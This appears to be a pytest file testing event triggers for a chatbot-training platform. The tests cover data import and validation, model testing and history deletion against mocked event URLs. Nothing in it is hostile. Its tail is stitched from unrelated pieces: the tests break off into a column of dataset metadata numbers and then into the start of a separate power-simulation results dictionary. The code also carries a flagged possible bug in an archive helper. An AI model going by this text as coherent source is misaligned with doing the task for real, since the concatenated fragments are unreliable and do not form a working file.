assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert not logs[0].get('end_timestamp')
assert not logs[0].get('status')
assert logs[0]['event_status'] == EVENT_STATUS.TASKSPAWNED.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_only_event(self, monkeypatch):
bot = 'test_events_bot_1'
user = 'test_user'
event_url = "http://url.event3"
monkeypatch.setitem(Utility.environment['model']['data_importer'], "event_url", event_url)
responses.add("POST",
event_url,
json={"message": "Event triggered successfully!"},
status=200,
match=[
responses.json_params_matcher(
[{'name': 'BOT', 'value': bot}, {'name': 'USER', 'value': user},
{'name': 'IMPORT_DATA', 'value': ''},
{'name': 'OVERWRITE', 'value': ''}])],
)
responses.start()
await EventsTrigger.trigger_data_importer(bot, user, False, False)
responses.stop()
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert not logs[0].get('end_timestamp')
assert not logs[0].get('status')
assert logs[0]['event_status'] == EVENT_STATUS.TASKSPAWNED.value
@pytest.mark.asyncio
async def test_trigger_data_importer_event_connection_error(self, monkeypatch):
bot = 'test_events_bot_1'
user = 'test_user'
event_url = "http://url.event4"
monkeypatch.setitem(Utility.environment['model']['data_importer'], "event_url", event_url)
await EventsTrigger.trigger_data_importer(bot, user, False, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert logs[0].get('exception').__contains__('Failed to trigger the event.')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
@pytest.mark.asyncio
async def test_trigger_data_importer_nlu_only(self, monkeypatch, get_training_data):
bot = 'test_trigger_data_importer'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
nlu_path = os.path.join(test_data_path, 'data')
Utility.make_dirs(nlu_path)
shutil.copy2('tests/testing_data/validator/valid/data/nlu.yml', nlu_path)
nlu, story_graph, domain, config, http_actions = await get_training_data('tests/testing_data/validator/valid')
mongo_processor = MongoProcessor()
mongo_processor.save_domain(domain, bot, user)
mongo_processor.save_stories(story_graph.story_steps, bot, user)
config["bot"] = bot
config["user"] = user
config_obj = Configs._from_son(config)
config_obj.save()
mongo_processor.save_rules(story_graph.story_steps, bot, user)
mongo_processor.save_integrated_actions(http_actions, bot, user)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=["nlu"])
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions'] == [[]]
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
assert len(mongo_processor.fetch_stories(bot)) == 2
assert len(list(mongo_processor.fetch_training_examples(bot))) == 7
assert len(list(mongo_processor.fetch_responses(bot))) == 3
assert len(mongo_processor.fetch_actions(bot)) == 2
assert len(mongo_processor.fetch_rule_block_names(bot)) == 3
@pytest.mark.asyncio
async def test_trigger_data_importer_stories_only(self, monkeypatch, get_training_data):
bot = 'test_trigger_data_importer_stories_only'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
data_path = os.path.join(test_data_path, 'data')
Utility.make_dirs(data_path)
shutil.copy2('tests/testing_data/validator/valid/data/stories.yml', data_path)
nlu, story_graph, domain, config, http_actions = await get_training_data('tests/testing_data/validator/valid')
mongo_processor = MongoProcessor()
mongo_processor.save_domain(domain, bot, user)
mongo_processor.save_nlu(nlu, bot, user)
config["bot"] = bot
config["user"] = user
config_obj = Configs._from_son(config)
config_obj.save()
mongo_processor.save_rules(story_graph.story_steps, bot, user)
mongo_processor.save_integrated_actions(http_actions, bot, user)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=["stories"])
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions'] == [[]]
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
assert len(mongo_processor.fetch_stories(bot)) == 2
assert len(list(mongo_processor.fetch_training_examples(bot))) == 7
assert len(list(mongo_processor.fetch_responses(bot))) == 3
assert len(mongo_processor.fetch_actions(bot)) == 2
assert len(mongo_processor.fetch_rule_block_names(bot)) == 3
@pytest.mark.asyncio
async def test_trigger_data_importer_rules_only(self, monkeypatch, get_training_data):
    """Importer event when only a rules file was uploaded.

    Mirrors the stories-only case: everything except rules is pre-saved in
    Mongo, only data/rules.yml is staged, and the import must succeed
    without validation errors.
    """
    bot = 'test_trigger_data_importer_rules_only'
    user = 'test'
    # Stage a fresh upload directory containing only data/rules.yml.
    test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
    data_path = os.path.join(test_data_path, 'data')
    Utility.make_dirs(data_path)
    shutil.copy2('tests/testing_data/validator/valid/data/rules.yml', data_path)
    # Pre-save the remaining training data directly (stories here, since
    # rules are the uploaded part).
    nlu, story_graph, domain, config, http_actions = await get_training_data('tests/testing_data/validator/valid')
    mongo_processor = MongoProcessor()
    mongo_processor.save_domain(domain, bot, user)
    mongo_processor.save_nlu(nlu, bot, user)
    config["bot"] = bot
    config["user"] = user
    config_obj = Configs._from_son(config)
    config_obj.save()
    mongo_processor.save_stories(story_graph.story_steps, bot, user)
    mongo_processor.save_integrated_actions(http_actions, bot, user)

    # Redirect the importer to the staged directory.
    def _path(*args, **kwargs):
        return test_data_path
    monkeypatch.setattr(Utility, "get_latest_file", _path)
    DataImporterLogProcessor.add_log(bot, user, files_received=["rules"])
    await EventsTrigger.trigger_data_importer(bot, user, True, False)
    logs = list(DataImporterLogProcessor.get_logs(bot))
    assert len(logs) == 1
    # No validation failures should be recorded for any section.
    assert not logs[0].get('intents').get('data')
    assert not logs[0].get('stories').get('data')
    assert not logs[0].get('utterances').get('data')
    assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions'] == [[]]
    assert not logs[0].get('training_examples').get('data')
    assert not logs[0].get('domain').get('data')
    assert not logs[0].get('config').get('data')
    assert not logs[0].get('exception')
    assert logs[0]['is_data_uploaded']
    assert logs[0]['start_timestamp']
    assert logs[0]['end_timestamp']
    assert logs[0]['status'] == 'Success'
    assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
    # Final persisted counts after the import completed.
    assert len(mongo_processor.fetch_stories(bot)) == 2
    assert len(list(mongo_processor.fetch_training_examples(bot))) == 7
    assert len(list(mongo_processor.fetch_responses(bot))) == 3
    assert len(mongo_processor.fetch_actions(bot)) == 2
    assert len(mongo_processor.fetch_rule_block_names(bot)) == 3
@pytest.mark.asyncio
async def test_trigger_data_importer_domain_only(self, monkeypatch, get_training_data):
    """Importer event when only a domain file was uploaded.

    Stories, rules, nlu, config and actions are pre-saved in Mongo; only
    domain.yml is staged (at the upload root, not under data/). The import
    must succeed with no validation errors.
    """
    bot = 'test_trigger_data_importer_domain_only'
    user = 'test'
    # Stage domain.yml at the upload root — domain files don't live in data/.
    test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
    Utility.make_dirs(test_data_path)
    shutil.copy2('tests/testing_data/validator/valid/domain.yml', test_data_path)
    # Pre-save every other section directly (note: no save_domain here,
    # the domain comes from the uploaded file).
    nlu, story_graph, domain, config, http_actions = await get_training_data('tests/testing_data/validator/valid')
    mongo_processor = MongoProcessor()
    mongo_processor.save_stories(story_graph.story_steps, bot, user)
    mongo_processor.save_nlu(nlu, bot, user)
    config["bot"] = bot
    config["user"] = user
    config_obj = Configs._from_son(config)
    config_obj.save()
    mongo_processor.save_rules(story_graph.story_steps, bot, user)
    mongo_processor.save_integrated_actions(http_actions, bot, user)

    # Redirect the importer to the staged directory.
    def _path(*args, **kwargs):
        return test_data_path
    monkeypatch.setattr(Utility, "get_latest_file", _path)
    DataImporterLogProcessor.add_log(bot, user, files_received=["domain"])
    await EventsTrigger.trigger_data_importer(bot, user, True, False)
    logs = list(DataImporterLogProcessor.get_logs(bot))
    assert len(logs) == 1
    # No validation failures should be recorded for any section.
    assert not logs[0].get('intents').get('data')
    assert not logs[0].get('stories').get('data')
    assert not logs[0].get('utterances').get('data')
    assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions'] == [[]]
    assert not logs[0].get('training_examples').get('data')
    assert not logs[0].get('domain').get('data')
    assert not logs[0].get('config').get('data')
    assert not logs[0].get('exception')
    assert logs[0]['is_data_uploaded']
    assert logs[0]['start_timestamp']
    assert logs[0]['end_timestamp']
    assert logs[0]['status'] == 'Success'
    assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
    # Final persisted counts after the import completed.
    assert len(mongo_processor.fetch_stories(bot)) == 2
    assert len(list(mongo_processor.fetch_training_examples(bot))) == 7
    assert len(list(mongo_processor.fetch_responses(bot))) == 3
    assert len(mongo_processor.fetch_actions(bot)) == 2
    assert len(mongo_processor.fetch_rule_block_names(bot)) == 3
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_existing_data(self, monkeypatch, get_training_data):
    """Importer event with an empty upload: validates the data that is
    already saved for the bot.

    Deliberately reuses the bot populated by
    test_trigger_data_importer_domain_only, so this test depends on that
    test having run first (hence two log entries afterwards).
    """
    bot = 'test_trigger_data_importer_domain_only'
    user = 'test'
    # Empty staging directory — nothing new is uploaded.
    test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
    Utility.make_dirs(test_data_path)

    def _path(*args, **kwargs):
        return test_data_path
    monkeypatch.setattr(Utility, "get_latest_file", _path)
    # No files_received: the event validates existing data only.
    DataImporterLogProcessor.add_log(bot, user)
    await EventsTrigger.trigger_data_importer(bot, user, True, False)
    logs = list(DataImporterLogProcessor.get_logs(bot))
    # One log from the earlier domain-only test plus this run.
    assert len(logs) == 2
    assert not logs[0].get('intents').get('data')
    assert not logs[0].get('stories').get('data')
    assert not logs[0].get('utterances').get('data')
    assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions'] == [[]]
    assert not logs[0].get('training_examples').get('data')
    assert not logs[0].get('domain').get('data')
    assert not logs[0].get('config').get('data')
    assert not logs[0].get('exception')
    assert logs[0]['is_data_uploaded']
    assert logs[0]['start_timestamp']
    assert logs[0]['end_timestamp']
    assert logs[0]['status'] == 'Success'
    assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
    # Existing data must be untouched by a validation-only run.
    mongo_processor = MongoProcessor()
    assert len(mongo_processor.fetch_stories(bot)) == 2
    assert len(list(mongo_processor.fetch_training_examples(bot))) == 7
    assert len(list(mongo_processor.fetch_responses(bot))) == 3
    assert len(mongo_processor.fetch_actions(bot)) == 2
    assert len(mongo_processor.fetch_rule_block_names(bot)) == 3
@pytest.mark.asyncio
async def test_trigger_data_importer_import_with_utterance_issues(self, monkeypatch):
    """Import succeeds despite orphan-utterance validation findings when the
    bot is configured with ignore_utterances=True.

    Utterance issues are still reported in the log, but status is Success
    and the data is imported.
    """
    bot = 'test_trigger_data_importer_import_with_utterance_issues'
    user = 'test'
    # Stage a full training-data tree that contains orphan utterances.
    test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
    shutil.copytree('tests/testing_data/validator/orphan_utterances', test_data_path)

    def _path(*args, **kwargs):
        return test_data_path
    monkeypatch.setattr(Utility, "get_latest_file", _path)
    # ignore_utterances makes utterance findings non-fatal for this bot.
    BotSettings(ignore_utterances=True, bot=bot, user=user).save()
    DataImporterLogProcessor.add_log(bot, user, files_received=['nlu', 'stories', 'domain', 'config'])
    await EventsTrigger.trigger_data_importer(bot, user, True, True)
    logs = list(DataImporterLogProcessor.get_logs(bot))
    assert len(logs) == 1
    assert not logs[0].get('intents').get('data')
    assert not logs[0].get('stories').get('data')
    # The utterance findings are recorded even though they were ignored.
    assert logs[0].get('utterances').get('data')
    assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
    assert not logs[0].get('training_examples').get('data')
    assert not logs[0].get('domain').get('data')
    assert not logs[0].get('config').get('data')
    assert not logs[0].get('exception')
    assert logs[0]['is_data_uploaded']
    assert logs[0]['start_timestamp']
    assert logs[0]['end_timestamp']
    assert logs[0]['status'] == 'Success'
    assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
    # Data was imported despite the findings.
    mongo_processor = MongoProcessor()
    assert len(mongo_processor.fetch_stories(bot)) == 2
    assert len(list(mongo_processor.fetch_training_examples(bot))) == 8
    assert len(list(mongo_processor.fetch_responses(bot))) == 8
    assert len(mongo_processor.fetch_actions(bot)) == 0
    assert len(mongo_processor.fetch_rule_block_names(bot)) == 1
@pytest.mark.asyncio
async def test_trigger_data_importer_import_with_intent_issues(self, monkeypatch):
    """Import fails when intent validation finds issues.

    Intent-name mismatches are fatal (unlike ignored utterance issues), so
    the log shows status Failure and nothing is imported.
    """
    bot = 'test_trigger_data_importer_import_with_intent_issues'
    user = 'test'
    # Stage a training-data tree with intent name mismatches.
    test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
    shutil.copytree('tests/testing_data/validator/intent_name_mismatch', test_data_path)

    def _path(*args, **kwargs):
        return test_data_path
    monkeypatch.setattr(Utility, "get_latest_file", _path)
    BotSettings(ignore_utterances=True, bot=bot, user=user).save()
    DataImporterLogProcessor.add_log(bot, user, files_received=['nlu', 'stories', 'domain', 'config'])
    await EventsTrigger.trigger_data_importer(bot, user, True, True)
    logs = list(DataImporterLogProcessor.get_logs(bot))
    assert len(logs) == 1
    # Intent findings are present; everything else is clean.
    assert logs[0].get('intents').get('data')
    assert not logs[0].get('stories').get('data')
    assert not logs[0].get('utterances').get('data')
    assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
    assert not logs[0].get('training_examples').get('data')
    assert not logs[0].get('domain').get('data')
    assert not logs[0].get('config').get('data')
    assert not logs[0].get('exception')
    assert logs[0]['is_data_uploaded']
    assert logs[0]['start_timestamp']
    assert logs[0]['end_timestamp']
    assert logs[0]['status'] == 'Failure'
    assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
    # Nothing is persisted on a failed validation.
    mongo_processor = MongoProcessor()
    assert len(mongo_processor.fetch_stories(bot)) == 0
    assert len(list(mongo_processor.fetch_training_examples(bot))) == 0
    assert len(list(mongo_processor.fetch_responses(bot))) == 0
    assert len(mongo_processor.fetch_actions(bot)) == 0
    assert len(mongo_processor.fetch_rule_block_names(bot)) == 0
@pytest.mark.asyncio
async def test_trigger_data_importer_forced_import(self, monkeypatch):
    """force_import=True in BotSettings imports the data even though the
    orphan-utterances fixture produces utterance validation findings."""
    bot = 'forced_import'
    user = 'test'
    # Same orphan-utterances fixture as the ignore_utterances test above.
    test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
    shutil.copytree('tests/testing_data/validator/orphan_utterances', test_data_path)

    def _path(*args, **kwargs):
        return test_data_path
    monkeypatch.setattr(Utility, "get_latest_file", _path)
    # force_import pushes the data through regardless of findings.
    BotSettings(force_import=True, bot=bot, user=user).save()
    DataImporterLogProcessor.add_log(bot, user, files_received=['nlu', 'stories', 'domain', 'config'])
    await EventsTrigger.trigger_data_importer(bot, user, True, True)
    logs = list(DataImporterLogProcessor.get_logs(bot))
    assert len(logs) == 1
    assert not logs[0].get('intents').get('data')
    assert not logs[0].get('stories').get('data')
    # Findings are still recorded in the log.
    assert logs[0].get('utterances').get('data')
    assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
    assert not logs[0].get('training_examples').get('data')
    assert not logs[0].get('domain').get('data')
    assert not logs[0].get('config').get('data')
    assert not logs[0].get('exception')
    assert logs[0]['is_data_uploaded']
    assert logs[0]['start_timestamp']
    assert logs[0]['end_timestamp']
    assert logs[0]['status'] == 'Success'
    assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
    # Data is imported in spite of the findings.
    mongo_processor = MongoProcessor()
    assert len(mongo_processor.fetch_stories(bot)) == 2
    assert len(list(mongo_processor.fetch_training_examples(bot))) == 8
    assert len(list(mongo_processor.fetch_responses(bot))) == 8
    assert len(mongo_processor.fetch_actions(bot)) == 0
    assert len(mongo_processor.fetch_rule_block_names(bot)) == 1
def test_trigger_model_testing_event_run_tests_on_model_no_model_found(self):
    """Model testing on a bot with no trained model records one failed log
    entry (FAIL event status, no stories/nlu results) and leaves no
    testing-data artifacts behind."""
    bot = 'test_events_bot'
    user = 'test_user'
    EventsTrigger.trigger_model_testing(bot, user, False)
    logs = list(ModelTestingLogProcessor.get_logs(bot))
    assert len(logs) == 1
    # Idiomatic membership test instead of calling __contains__ directly.
    assert 'Model testing failed: Folder does not exists!' in logs[0].get('exception')
    assert logs[0]['start_timestamp']
    assert not logs[0].get('stories')
    assert not logs[0].get('nlu')
    assert logs[0].get('end_timestamp')
    assert not logs[0].get('status')
    assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
    # The per-bot testing_data workspace must have been cleaned up.
    assert not os.path.exists(os.path.join('./testing_data', bot))
@pytest.fixture
def load_data(self):
    """Fixture returning an async helper that stages training files, loads
    them via Rasa's file importer, and persists them for the given bot."""
    async def _read_and_get_data(config_path: str, domain_path: str, nlu_path: str, stories_path: str, bot: str, user: str):
        # Stage nlu and stories files in a fresh unique directory.
        staging_dir = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
        os.mkdir(staging_dir)
        for source_file in (nlu_path, stories_path):
            shutil.copy2(source_file, staging_dir)
        # Parse the staged data with Rasa's importer.
        file_importer = RasaFileImporter.load_from_config(config_path=config_path,
                                                          domain_path=domain_path,
                                                          training_data_paths=staging_dir)
        loaded_domain = await file_importer.get_domain()
        loaded_stories = await file_importer.get_stories()
        loaded_config = await file_importer.get_config()
        loaded_nlu = await file_importer.get_nlu_data(loaded_config.get('language'))
        # Persist everything for the bot, replacing whatever exists.
        MongoProcessor().save_training_data(bot, user, loaded_config, loaded_domain,
                                            loaded_stories, loaded_nlu, overwrite=True)
    return _read_and_get_data
@pytest.fixture
def create_model(self):
    """Fixture returning a helper that places a trained model archive under
    models/<bot>, optionally stripping the nlu component from it."""
    def move_model(path: str, bot: str, remove_nlu_model=False):
        bot_training_home_dir = os.path.join('models', bot)
        if not os.path.exists(bot_training_home_dir):
            os.mkdir(bot_training_home_dir)
        if remove_nlu_model:
            # Unpack the archive, delete its nlu directory, repack.
            tmp = os.path.join(bot_training_home_dir, 'tmp')
            shutil.unpack_archive(path, tmp)
            shutil.rmtree(os.path.join(tmp, 'nlu'))
            # NOTE(review): root_dir=bot_training_home_dir archives the parent
            # directory (which contains tmp/) rather than the stripped model in
            # tmp/ — looks like this should be root_dir=tmp; confirm intent.
            shutil.make_archive(tmp, format='gztar', root_dir=bot_training_home_dir)
            shutil.rmtree(tmp)
        else:
            shutil.copy2(path, bot_training_home_dir)
    return move_model
@pytest.mark.asyncio
async def test_trigger_model_testing_event_run_tests_on_model(self, load_data, create_model, monkeypatch):
    """Runs model testing against a real staged model with the story-test
    runner mocked out, and checks a successful log entry is appended."""
    import rasa.utils.common
    bot = 'test_events_bot'
    user = 'test_user'
    config_path = 'tests/testing_data/model_tester/config.yml'
    domain_path = 'tests/testing_data/model_tester/domain.yml'
    nlu_path = 'tests/testing_data/model_tester/nlu_success/nlu.yml'
    stories_path = 'tests/testing_data/model_tester/training_stories_success/stories.yml'
    await load_data(config_path, domain_path, nlu_path, stories_path, bot, user)
    create_model(pytest.model_path, bot)

    # Stub out rasa's story evaluation with fixed metrics.
    def _mock_stories_output(*args, **kwargs):
        return {
            "precision": 0.91,
            "f1": 0.98,
            "accuracy": 0.99,
            "failed_stories": [],
        }
    monkeypatch.setattr(rasa.utils.common, 'run_in_loop', _mock_stories_output)
    # Stub the augmentation service used for paraphrase generation.
    responses.add('POST',
                  Utility.environment["augmentation"]["paraphrase_url"],
                  json={'data': {'paraphrases': ['common training example']}})
    responses.start()
    EventsTrigger.trigger_model_testing(bot, user, False)
    logs = list(ModelTestingLogProcessor.get_logs(bot))
    # One log from the earlier no-model test for this bot plus this run.
    assert len(logs) == 2
    assert not logs[0].get('exception')
    assert logs[0]['start_timestamp']
    assert logs[0].get('data')
    assert logs[0].get('end_timestamp')
    assert not Utility.check_empty_string(logs[0].get('status'))
    assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
    # Temporary testing data must be cleaned up.
    assert not os.path.exists(os.path.join('./testing_data', bot))
def test_trigger_model_testing_event_connection_error(self, monkeypatch):
    """When the configured model-test event URL is unreachable, the trigger
    logs a failure entry with the connection exception recorded."""
    bot = 'test_events_bot'
    user = 'test_user'
    # Point the event trigger at a URL that is not mocked, so the HTTP
    # call fails and the failure path is exercised.
    event_url = "http://url.event"
    monkeypatch.setitem(Utility.environment['model']['test'], "event_url", event_url)
    EventsTrigger.trigger_model_testing(bot, user, True)
    logs = list(ModelTestingLogProcessor.get_logs(bot))
    # Two logs from earlier tests on this bot plus this run.
    assert len(logs) == 3
    # Idiomatic membership test instead of calling __contains__ directly.
    assert 'Failed to trigger the event. ' in logs[0].get('exception')
    assert logs[0]['start_timestamp']
    assert not logs[0].get('data')
    assert logs[0].get('end_timestamp')
    assert not logs[0].get('status')
    assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
    # No testing artifacts should be left behind.
    assert not os.path.exists(os.path.join('./testing_data', bot))
@pytest.mark.asyncio
async def test_trigger_model_testing(self, load_data, create_model, monkeypatch):
    """Model testing with ModelTester.run_tests_on_model fully mocked:
    verifies a successful log entry with result data is recorded."""
    bot = 'test_events_bot'
    user = 'test_user'

    # Return canned nlu/story metrics instead of running real evaluation.
    def _mock_test_result(*args, **kwargs):
        stories = {
            "precision": 0.91,
            "f1": 0.98,
            "accuracy": 0.99,
            "failed_stories": [],
        }
        nlu = {
            "precision": 0.91,
            "f1": 0.98,
            "accuracy": 0.99,
            "response_selection_evaluation": [],
            "intent_evaluation": [],
        }
        return nlu, stories
    monkeypatch.setattr(ModelTester, "run_tests_on_model", _mock_test_result)
    EventsTrigger.trigger_model_testing(bot, user)
    # Data/model staging happens after the trigger here; the mocked tester
    # does not need them, they set up state for subsequent tests.
    config_path = 'tests/testing_data/model_tester/config.yml'
    domain_path = 'tests/testing_data/model_tester/domain.yml'
    nlu_path = 'tests/testing_data/model_tester/nlu_success/nlu.yml'
    stories_path = 'tests/testing_data/model_tester/test_stories_success/test_stories.yml'
    await load_data(config_path, domain_path, nlu_path, stories_path, bot, user)
    create_model(pytest.model_path, bot)
    logs = list(ModelTestingLogProcessor.get_logs(bot))
    # Three logs from earlier tests on this bot plus this run.
    assert len(logs) == 4
    assert not logs[0].get('exception')
    assert logs[0]['start_timestamp']
    assert logs[0].get('end_timestamp')
    assert logs[0].get('status')
    assert logs[0].get('data')
    assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
    assert not os.path.exists(os.path.join('./testing_data', bot))
def test_trigger_model_testing_event(self, monkeypatch):
    """When an event URL is configured and reachable, model testing is
    dispatched to the event server and the log stays in TASKSPAWNED."""
    bot = 'test_events_bot'
    user = 'test_user'
    event_url = "http://url.event"
    monkeypatch.setitem(Utility.environment['model']['test'], "event_url", event_url)
    # Mock the event server; the matcher also verifies the payload
    # carries the expected BOT/USER environment variables.
    responses.add("POST",
                  event_url,
                  json={"message": "Event triggered successfully!"},
                  status=200,
                  match=[
                      responses.json_params_matcher(
                          [{'name': 'BOT', 'value': bot}, {'name': 'USER', 'value': user}])],
                  )
    responses.start()
    EventsTrigger.trigger_model_testing(bot, user)
    responses.stop()
    logs = list(ModelTestingLogProcessor.get_logs(bot))
    # Four logs from earlier tests on this bot plus this run.
    assert len(logs) == 5
    assert not logs[0].get('exception')
    assert logs[0]['start_timestamp']
    # The event was only dispatched, not executed: no end time or status yet.
    assert not logs[0].get('end_timestamp')
    assert not logs[0].get('status')
    assert logs[0]['event_status'] == EVENT_STATUS.TASKSPAWNED.value
    assert not os.path.exists(os.path.join('./testing_data', bot))
def test_trigger_history_deletion_for_bot(self, monkeypatch):
    """History deletion dispatched to the configured event server: payload
    carries bot/user/month/sender_id and the log stays in TASKSPAWNED."""
    bot = 'test_events_bot'
    user = 'test_user'
    month = 1
    sender_id = None  # deletion for the whole bot, not a single sender
    event_url = "http://url.event"
    monkeypatch.setitem(Utility.environment['history_server']['deletion'], "event_url", event_url)
    # Mock the event server and verify the full env-var payload.
    responses.add("POST",
                  event_url,
                  json={"message": "Event triggered successfully!"},
                  status=200,
                  match=[
                      responses.json_params_matcher(
                          [{'name': 'BOT', 'value': bot}, {'name': 'USER', 'value': user},
                           {'name': 'MONTH', 'value': month}, {'name': 'SENDER_ID', 'value': sender_id}])],
                  )
    responses.start()
    EventsTrigger.trigger_history_deletion(bot, user, month)
    responses.stop()
    logs = list(HistoryDeletionLogProcessor.get_logs(bot))
    assert len(logs) == 1
    assert not logs[0].get('exception')
    assert logs[0]['start_timestamp']
    assert not logs[0].get('end_timestamp')
    assert logs[0]['status'] == EVENT_STATUS.TASKSPAWNED.value
| 48.575248
| 128
| 0.638348
| 6,101
| 49,061
| 4.920669
| 0.043108
| 0.0478
| 0.048233
| 0.067153
| 0.896806
| 0.891809
| 0.877919
| 0.867326
| 0.855967
| 0.834649
| 0
| 0.011874
| 0.227553
| 49,061
| 1,009
| 129
| 48.623389
| 0.780299
| 0.000448
| 0
| 0.78771
| 0
| 0
| 0.163818
| 0.037625
| 0
| 0
| 0
| 0
| 0.424581
| 1
| 0.030168
| false
| 0
| 0.138547
| 0.018994
| 0.194413
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9843d61dd43be181d40c406d7fe6b2351b1aadda
| 68,651
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC_2/cmp_milc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC_2/cmp_milc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC_2/cmp_milc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.132204,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.306527,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
